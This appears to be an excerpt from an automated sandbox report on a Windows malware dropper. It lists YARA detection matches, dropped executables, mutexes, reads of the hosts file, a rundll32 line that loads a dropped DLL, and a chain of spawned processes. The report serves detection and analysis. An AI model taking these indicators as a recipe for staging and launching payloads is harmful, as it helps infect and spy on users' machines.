      Source: 00000010.00000000.946369604.000000000063A000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.766043822.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.762967714.000000000063A000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.739471519.00000000005F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000002.1003205218.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.766714248.00000000005F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.718558359.00000000005F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000025.00000003.822255696.000001DA29C60000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
      Source: 00000019.00000002.735071284.00000000005B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
      Source: 00000010.00000000.759921983.00000000005F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.722503902.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000002.1003466769.00000000005F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.773475326.000000000063A000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.742326442.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.725474792.000000000063A000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000002.1003521614.000000000063A000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.840920801.000000000063A000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.840850532.00000000005F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.744015353.000000000063A000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.921076949.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.705454896.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.767127574.000000000063A000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.933364985.00000000005F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 00000010.00000000.766966642.00000000005F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: Process Memory Space: YX7wpjoMI0vZoMwVbFh9XNIC.exe PID: 4240, type: MEMORY Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
      Source: 16.3.BqbASL8ovE3o_gRiKrvwENXN.exe.20c0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.12.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.28.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.11.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.2.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.2.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.12.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 37.0.svchost.exe.1da29cd0000.4.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.27.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.19.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.14.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 19.3.KyTQCmNmjazMZrvIWzjrSsQG.exe.3def220.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.14.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.27.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 37.0.svchost.exe.1da29cd0000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
      Source: 19.3.KyTQCmNmjazMZrvIWzjrSsQG.exe.3de7620.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.19.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.2.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.3.BqbASL8ovE3o_gRiKrvwENXN.exe.20c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.20.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.2.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.2.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.13.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.13.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 19.3.KyTQCmNmjazMZrvIWzjrSsQG.exe.3decfc0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.11.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.2.BqbASL8ovE3o_gRiKrvwENXN.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.28.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.20.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 6.0.YX7wpjoMI0vZoMwVbFh9XNIC.exe.bf0000.0.unpack, SystemSecurityCryptographyCAPIBaseCMSGCMSRECIPIENTINFO30299.cs Base64 encoded string: '
      Source: 6.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.bf0000.0.unpack, SystemSecurityCryptographyCAPIBaseCMSGCMSRECIPIENTINFO30299.cs Base64 encoded string: '
      Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@68/339@28/18
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe Code function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe Code function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe File created: C:\Program Files (x86)\Company
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:64:120:WilError_01
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6252:120:WilError_01
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe Mutant created: \Sessions\1\BaseNamedObjects\37238328-1324242-5456786-8fdff0-67547552436675
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6064:120:WilError_01
      Source: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe File created: C:\Users\user\AppData\Local\Temp\axhub.dll
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe Command line argument: 08A
      Source: yevbZfdCqR.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe System information queried: HandleInformation
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File read: C:\Users\user\Desktop\desktop.ini
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Program Files (x86)\Browzar\Browzar.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Program Files (x86)\Browzar\Browzar.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Program Files (x86)\Browzar\Browzar.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rUNdlL32.eXe' 'C:\Users\user\AppData\Local\Temp\axhub.dll',axhub
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.962502810.0000000000400000.00000040.00020000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.962502810.0000000000400000.00000040.00020000.sdmp, jfiag3g_gg.exe, 00000017.00000002.728626975.0000000000401000.00000040.00020000.sdmp, md8_8eus.exe, 00000023.00000002.964153694.00000000004D9000.00000002.00020000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.962502810.0000000000400000.00000040.00020000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.962502810.0000000000400000.00000040.00020000.sdmp, md8_8eus.exe, 00000023.00000002.964153694.00000000004D9000.00000002.00020000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.962502810.0000000000400000.00000040.00020000.sdmp, md8_8eus.exe, 00000023.00000002.964153694.00000000004D9000.00000002.00020000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000002.965244604.0000000000400000.00000040.00020000.sdmp, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.962502810.0000000000400000.00000040.00020000.sdmp, md8_8eus.exe, 00000023.00000002.964153694.00000000004D9000.00000002.00020000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.962502810.0000000000400000.00000040.00020000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
      Source: yevbZfdCqR.exeVirustotal: Detection: 67%
      Source: yevbZfdCqR.exeMetadefender: Detection: 25%
      Source: yevbZfdCqR.exeReversingLabs: Detection: 68%
      Source: unknown Process created: C:\Users\user\Desktop\yevbZfdCqR.exe 'C:\Users\user\Desktop\yevbZfdCqR.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe 'C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe 'C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe 'C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process created: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe 'C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe'
